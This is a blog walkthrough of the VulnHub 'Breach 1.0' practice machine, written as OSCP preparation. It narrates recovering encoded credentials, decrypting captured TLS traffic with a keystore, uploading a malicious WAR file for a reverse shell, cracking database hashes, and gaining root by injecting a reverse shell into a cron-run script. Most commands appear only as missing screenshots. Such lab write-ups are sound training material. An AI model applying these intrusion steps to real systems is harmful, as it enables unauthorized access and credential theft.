Breach 1.0 machine — Walkthrough

8 min readDec 26, 2023

Hi guys, this is the eighth day and eighth box (D-8B for my personal reference). I will be trying to complete at least one box per day (if could two or more) so I could gain my confidence, learn new knowledge, and prepare for OSCP.

Wish me luck!

So, today I would like to work on Breach 1.0 machine, which is from VulnHub. Let’s get started!

################################################################ — — — — — — — — — Please read to the end! Thank you! — — — — — — — — —
################################################################

Enumeration

Nmap

The moment i run it, I can see there is tons of open ports and I am freaked out for a moment but its ok.

Gobuster

Running gobuster and there is only images that we can probably access.

HTTP

This is the page when the target ip is entered. It looks like someone is not happy with the work or the company and left the parting gift.

There is a string on the source page that might be useful.

The string was encoded with base64 twice. By using cyberchef, we can easily get the original string, and it looks like credential.

Then, we can press the image and it will lead us to /initech.html.

/initech.html

This is the page when it is loaded.

The source page again, telling us the disgruntled employee is sitting at the beach reading other’s email.

Exploring the page!

/images/cake.jpg

Pressing the Cake navigation tab on the left will shows us an image. I downloaded it to see if there is any hidden information.

But exiftool looks just fine. Maybe I overthink but sometimes is good to cover all the possible elements.

images/swingline.jpg

This loads when stapler on the navigation bar is pressed.

impresscms/user.php

When pressed on employee portal, it will lead us here.

Try the login credentials found just now.

And we are in as Peter Gibbons.

Finding Useful items or things

We can see there is 3 new message in the inbox. Let’s check it.

FWD: Thank you for your purchase of Super Secret Cert Pro!
We can see that the user receive a new SSL certificate that is stored in /.keystore.

Posting sensitive content

So, there will be sensitive contents in admin portal. And the password is “extremely secure” or it mean it is extremely secure? Let us find out.

/.keystore

When you search for /.keystore, it will automatically download a file.

Then, when you search ssl on the search bar, it will return a result.

When clicked on the result, we can see that we have a pcap file that we can analyse it, also we also see that alias, storepassword and keypassword are all set to ‘tomcat’.

While checking the pcap file with wireshark, using Follow Tcp Stream, the message is encoded and we are nto able to read it.

So, the keystore file must be the “key” to unlock it. After searching for quite sometime, I had located a possible tools that we can use.

Link: https://security.stackexchange.com/questions/3779/how-can-i-export-my-private-key-from-a-java-keytool-keystore

And we back to wireshark to place the key we just unlocked. Go to Edit -> Preferences -> Protocol -> TLS (SSL not available) -> Edit… .

IP address — target IP
Port — the http port
Protocol — http
Key file — the path to your key
Password — tomcat

Then by following the http stream, we will get the follow.

Using Cyber chef, we can crack the string.

Check the stream further and we can see there is a url that we will be possibily using.

Go to the url and key in the password once prompted.

After checking, I think the only way I could think of at the moment is by up loading the file. So, I searched.

Then,

Finally, upload it to the server. First upload, then deploy.

Set up netcat listener.

Wait the connection after running the war file.

Shell Finally!

Now we can go to upgrade the shell first.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Going to milton’s folder. We can see there is a some_script.sh.

Looks like there is nothing here.

Try to navigate around and see.

From the image above, we can see there is a database but no password. Then, we can try to see if there is anythign we can use in the database.

Now, we can try to find.

Then use mysql and show tables.

Then, select * from user;

We can then crack the hash or the strings using crackstation.

Now exit the mysql and switch user to milton with the cracked password.

TO MILTON!

I tried sudo -l to check privilege but it failed.

So, we meet again peas.

Note: You can download it on /tmp and run chmod 777.

And, we found this and it looks good.

The file:

I tried to use it but I am not able to write the file (I still need more learning). Then, I tried to use another method.

Also, I found an interesting file here:

Looks like some script is running every 2 minutes.

To Root!

After checking, we can see that there is a bill.png. We can use exiftool to read it.

Then we will get, something in comment.

We can try to switch user to blumbergh, and it works!

Check for permission:

Showing the content of tidyup.sh:

We could use this to our advantage to make a reverse shell.

We can echo a reverse shell into it and we can set up a listener first.

I found it on GTFO bins for tee.

When I tried to use it, it failed when I include -a in it. BUT, it success when -a is excluded from the command.

Now try it without -a and see if it works.

Yes, and now we wait for the reverse connection…

YES, IT IS FINALLY DONE!

This box takes me longer than expected… But I guess I learnt something too. So, its a win for me.

Thank you for reading my write-up. I would like to improve my write-up skills in the future and can reach me through Twitter or comments. Any sponsors also welcomed.

Twitter: https://twitter.com/curse_jk

Buy me coffee:http://buymeacoffee.com/Cursemagic

Other medium write-ups: https://cursemagic.medium.com